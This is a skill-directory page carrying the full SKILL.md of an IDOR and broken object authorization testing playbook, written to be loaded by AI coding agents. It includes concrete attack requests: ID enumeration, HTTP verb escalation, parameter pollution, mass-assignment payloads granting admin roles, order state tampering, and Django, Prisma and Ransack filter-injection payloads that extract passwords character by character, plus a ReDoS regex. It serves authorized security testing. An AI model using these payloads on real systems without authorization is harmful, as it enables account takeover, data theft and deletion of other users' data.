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idor-broken-object-authorization

yaklang/hack-skills

IDOR and broken object-level authorization testing playbook for API security.

What is idor-broken-object-authorization?

Comprehensive attack methodology for finding Insecure Direct Object Reference (IDOR) and Broken Object Level Authorization (BOLA) vulnerabilities in APIs. Use when testing endpoints that expose object identifiers, lack proper authorization checks, or have writable fields accessible across user boundaries.

  • Systematically identify object IDs across all request locations (URL, body, headers, cookies, GraphQL)
  • Execute A-B testing methodology using two test accounts to confirm authorization bypass
  • Distinguish between IDOR/BOLA (object-level), BFLA (function-level), horizontal, and vertical privilege escalation attacks
  • Test HTTP method escalation, parameter pollution, type confusion, and indirect IDOR through reference chains
  • Detect mass assignment vulnerabilities and hidden fields that enable privilege escalation
  • Identify state machine abuse and business logic flaws in resource workflows

How to install idor-broken-object-authorization

npx skills add https://github.com/yaklang/hack-skills --skill idor-broken-object-authorization
Claude Code
Cursor
Windsurf
Cline

How to use idor-broken-object-authorization

  1. 1.Create two test user accounts (UserA and UserB) with different privilege levels
  2. 2.Perform all application actions as UserA while capturing requests in a proxy (Burp Suite, etc.)
  3. 3.Document every object ID encountered across all request locations (path, query, body, headers, cookies)
  4. 4.Authenticate as UserB and replay UserA's requests using UserB's session token
  5. 5.Verify whether UserB can read or modify UserA's data; if yes, IDOR is confirmed
  6. 6.Test all HTTP verbs (GET, POST, PUT, PATCH, DELETE) on each endpoint with another user's ID
  7. 7.Attempt sequential ID manipulation (±1 from your own ID) and UUID enumeration
  8. 8.Test sub-resources and indirect references without parent object authorization

Use cases

Good for
  • Testing REST/GraphQL APIs for horizontal privilege escalation by accessing other users' data with modified object IDs
  • Discovering admin endpoints and functions accessible to low-privilege users (BFLA)
  • Validating authorization checks across all HTTP methods (GET, POST, PUT, PATCH, DELETE) on the same endpoint
  • Identifying hidden fields in request bodies that grant unintended privileges or skip validation steps
  • Testing compound IDs and sub-resource authorization (e.g., attachments within messages)
Who it's for
  • API security testers and penetration testers
  • Bug bounty hunters targeting OWASP API Top 10 vulnerabilities
  • Security engineers validating authorization implementations
  • Developers building authorization test suites

idor-broken-object-authorization FAQ

What is the difference between IDOR, BOLA, and BFLA?

IDOR (Insecure Direct Object Reference) and BOLA (Broken Object Level Authorization) both refer to accessing objects you shouldn't own (other users' data). BFLA (Broken Function Level Authorization) is different—it's when a low-privilege user accesses high-privilege functions like admin endpoints or bulk operations.

Where should I look for object IDs if they're not in the URL path?

Object IDs appear in many locations: URL query parameters, request body JSON fields, HTTP headers (X-User-ID, X-Account-ID), cookies, GraphQL arguments, form fields, and WebSocket messages. Always check all locations, not just URL paths.

How do I test if an API properly checks authorization on all HTTP methods?

Test the same endpoint with different HTTP verbs. For example, if GET /api/users/1234 is properly restricted, try POST, PUT, PATCH, and DELETE on the same endpoint. Authorization logic is often implemented per-method, and developers frequently miss edge cases.

What is mass assignment and how does it relate to IDOR?

Mass assignment occurs when a POST or PUT endpoint accepts extra fields in the request body that aren't documented but exist in the underlying model. An attacker can set hidden fields like 'role': 'admin' or 'isAdmin': true during registration or profile updates to escalate privileges.

How do I find hidden admin endpoints?

Check JavaScript bundles for admin route definitions, review API documentation for 'admin' or 'internal' tags, enumerate common admin paths like /api/v1/admin/**, /api/v1/manage/**, and /api/v1/internal/**, use Burp's content discovery on the API base path, and compare regular user docs with admin documentation if available.

Full instructions (SKILL.md)

Source of truth, from yaklang/hack-skills.


name: idor-broken-object-authorization description: >- IDOR and broken object authorization testing playbook. Use when requests expose object identifiers, tenant boundaries, writable fields, or missing object-level authorization checks.

SKILL: IDOR / Broken Object Level Authorization — Expert Attack Playbook

AI LOAD INSTRUCTION: IDOR is the #1 bug bounty finding. This skill covers non-obvious IDOR surfaces, all attack vectors (not just URL params), A-B testing methodology, BOLA vs BFLA distinction, chaining IDOR to higher impact, and what testers repeatedly miss.


1. IDOR vs BOLA vs BFLA

TermMeaningImpact
IDORInsecure Direct Object ReferenceRead/modify other users' data
BOLABroken Object Level Authorization (OWASP API Top 10 A1)Same as IDOR, API terminology
BFLABroken Function Level AuthorizationLow-priv user accesses HIGH-PRIV functions (e.g., admin endpoints)

Key distinction:

  • BOLA = accessing object you shouldn't own (data belonging to other users)
  • BFLA = accessing function you shouldn't be authorized for (admin CRUD operations, bulk actions, user management)

2. WHERE TO FIND OBJECT IDs (ALL LOCATIONS)

Don't stop at URL path parameters — IDs appear in:

URL path:        GET /api/v1/users/1234/profile
URL query:       GET /orders?order_id=982
Request body:    {"userId": 1234, "action": "view"}
JSON fields:     {"resource": {"id": 5678, "type": "invoice"}}
Headers:         X-User-ID: 1234
                 X-Account-ID: 9999
Cookies:         user_id=1234; account=org_5678
GraphQL args:    query { user(id: "1234") { ... } }
Form fields:     <input name="documentId" value="5678">
WebSocket msgs:  {"event":"subscribe","channel_id":9999}

3. A-B TESTING METHODOLOGY

The most systematic IDOR test approach:

Step 1: Create two test accounts: UserA and UserB
Step 2: Perform all actions as UserA, capture all requests
        (profile edit, order view, password change, file access, etc.)
Step 3: Note every object ID created or accessed by UserA
Step 4: Authenticate as UserB
Step 5: Replay UserA's requests using UserB's session token
Step 6: If UserB can read/modify UserA's data → BOLA confirmed

Victim matters: for real bugs, target existing users, not test accounts.
Report evidence: show UserA owns the resource, UserB accessed it.

4. ID TYPE ITS IMPLICATIONS

ID PatternExampleNotes
Sequential intid=1001id=1002Easy prediction, high hit rate
UUID v4550e8400-...Need to find UUID from other endpoints
UUID v1Clock-based UUIDTime-predictable! Extract timestamp/MAC
GUIDs from own dataSee in responsesCollect all UUIDs from your own account data first
Hashed IDsmd5(user_id)Try hashing sequential ints
Encoded IDsbase64({"id":1001})Decode → modify → re-encode
Compound IDs/api/users/1/orders/5Both IDs may be independently verifiable

5. HORIZONTAL vs VERTICAL PRIVILEGE ESCALATION

Horizontal: UserA accesses UserB's data (same privilege level)

GET /api/account/1234/statement     ← you are user 5678

Vertical: Low-priv user accesses admin-only functions

POST /api/admin/users/delete        ← normal user calling admin endpoint
GET /api/admin/all-users
PUT /api/users/1234/role {"role":"admin"}

Combined: Low-priv IDOR that grants privilege escalation

GET /api/v1/users/1/details → read admin user's auth token

6. HTTP METHOD ESCALATION

When GET /resource/1234 is properly restricted, test ALL other verbs:

GET    /api/v1/users/UserA_ID    ← might be blocked
POST   /api/v1/users/UserA_ID    ← different code path, might not check authz
PUT    /api/v1/users/UserA_ID    ← update another user's data
DELETE /api/v1/users/UserA_ID    ← delete another user's account
PATCH  /api/v1/users/UserA_ID    ← partial update (often missed in authz checks)

Why this works: Authorization logic is often implemented per-method, and developers forget edge cases.


7. PARAMETER POLLUTION & TYPE CONFUSION

When id=1234 is validated, try:

id[]=1234&id[]=5678          ← array — app may use first or last
id=5678&id=1234              ← duplicate — app may prefer first or last
{"id": "1234"}               ← string vs int: might hit different code path
{"id": [1234]}               ← array in JSON
{"userId": 1234, "id": 5678} ← two ID fields — which is used for authz?

JSON Type Confusion:

{"userId": "1234"}   vs   {"userId": 1234}

Some ORMs handle string vs integer differently in queries.


8. BFLA (FUNCTION LEVEL) ATTACKS

Common BFLA Endpoints to Test

# User management (admin-only in design):
GET /api/v1/admin/users
DELETE /api/v1/users/{any_user_id}
PUT /api/v1/users/{user_id}/role

# Bulk operations:
POST /api/v1/users/bulk-delete
GET /api/v1/export/all-data

# Billing/payment admin:
POST /api/v1/admin/subscription/modify
GET /api/v1/admin/payments/all

# Internal reporting:
GET /api/v1/reports/all-users-activity

How to Find Hidden Admin Endpoints

  1. Read JS bundles — admin routes often exposed in frontend code
  2. Look at API docs (Swagger/OpenAPI) for "admin", "internal", "privileged" tags
  3. Enumerate /api/v1/admin/**, /api/v1/manage/**, /api/v1/internal/**
  4. Burp "Discover Content" on API base path
  5. Compare regular user docs vs admin section docs if available

9. INDIRECT IDOR (REFERENCE CHAIN)

App checks permission on object A but doesn't check ownership of referenced object B:

Example:

UserA has permission to read their own messages.
GET /api/messages/1234 → checks: "does user own message 1234?" ✓

But: messages have attachments.
GET /api/attachments/5678 → doesn't check: "does attachment belong to message owned by user?"

Test: access attachments/sub-resources directly via their IDs without going through parent endpoint.

GraphQL variant: Inline querying related objects without separate authorization:

query {
  myProfile {
    followers {
      privateEmail    ← accessing private field of OTHER users via relationship
    }
  }
}

10. MASS ASSIGNMENT → PRIVILEGE ESCALATION

When POST/PUT takes a JSON body, properties in the underlying model may be settable even if not in the official API docs:

POST /api/v1/register
{
  "username": "attacker",
  "email": "a@evil.com",
  "password": "password",
  "role": "admin",          ← hidden field
  "isAdmin": true,          ← hidden field
  "verified": true,         ← skip email verification
  "creditBalance": 9999     ← give self credits
}

How to find hidden fields:

  1. Intercept admin "create user" vs normal "register" — diff the fields
  2. Read API documentation for all possible fields
  3. Check source code if available (GitHub, JS bundles)
  4. Fuzz with Burp: add common property names and check for 200 vs 400

11. STATE MACHINE ABUSE (BUSINESS LOGIC IDOR)

When resources have a status/state:

order.status: pending → confirmed → shipped → delivered

Test: Can you skip states?

PUT /api/orders/1234 {"status": "delivered"}  ← from "pending"
PUT /api/orders/1234 {"status": "refunded"}   ← from "pending" (skip shipped)

Can you set another user's order status?

PUT /api/orders/UserA_order_id {"status": "cancelled"}  ← as UserB

12. QUICK IDOR CHECKLIST

□ Create 2 accounts (UserA + UserB)
□ Map all API calls that contain object IDs (Burp History export filter)
□ Test all HTTP verbs on each endpoint
□ Test ID in all locations: path, body, header, query, cookie
□ Try sequential IDs (−1, +1 from your own)
□ Try UUIDs/GUIDs collected from your own account data
□ Test sub-resources (attachments, comments, transactions)
□ Test admin endpoints directly (BFLA)
□ Test POST/PUT body for extra fields (mass assignment)
□ Compare JSON response field count vs documented fields (hidden fields)
□ Test state/status field modification

13. SYSTEMATIC IDOR TESTING — 8 CATEGORIES

#CategoryTest Method
1Direct ID referenceChange numeric/UUID ID in URL: /api/users/123/api/users/124
2Predictable UUIDIf UUIDs are v1 (time-based), adjacent IDs are calculable
3Batch/bulk operations/api/users/bulk?ids=123,456 — add other users' IDs
4Export/downloadExport endpoint leaks other users' data: /export?user_id=*
5Linked object IDORChange order.address_id to another user's address
6Resource replacementUpdate own profile with another user's resource ID → overwrites
7Write IDORPUT/PATCH/DELETE with other user's ID — modify/delete their data
8Nested object/api/orgs/1/users/2 — change org ID to access other org's users

Testing Flow

1. Create two test accounts (A and B)
2. Perform all CRUD operations as A, capture all request IDs
3. Replay each request replacing A's IDs with B's IDs
4. Check: Can A read B's data? Modify? Delete?
5. Test with: numeric IDs, UUIDs, slugs, encoded values
6. Test across: URL path, query params, JSON body, headers

14. ORM FILTER CHAIN LEAKS

Django ORM Filter Injection

# Vulnerable: User.objects.filter(**request.data)
# Attacker sends: {"password__startswith": "a"}
# Django translates to: WHERE password LIKE 'a%'

# Character-by-character extraction:
POST /api/users/
{"username": "admin", "password__startswith": "a"}   → 200 (match)
{"username": "admin", "password__startswith": "b"}   → 404 (no match)
# Iterate through charset for each position

# Relational traversal:
{"author__user__password__startswith": "a"}
# Traverses: Author → User → password field

# On MySQL: ReDoS via regex
{"email__regex": "^(a+)+$"}  → CPU spike if match exists

Prisma Filter Injection

// Vulnerable: prisma.user.findMany({ where: req.body })
// Attacker sends nested include/select:
{
  "include": {
    "posts": {
      "include": {
        "author": {
          "select": {"password": true}
        }
      }
    }
  }
}
// Leaks password field through relation traversal

Ransack (Ruby on Rails)

# Ransack allows search predicates via query params:
GET /users?q[password_cont]=admin
# Searches: WHERE password LIKE '%admin%'

# Character extraction:
GET /users?q[password_start]=a   → count results
GET /users?q[password_start]=ab  → narrow down
# Tool: plormber (automated Ransack extraction)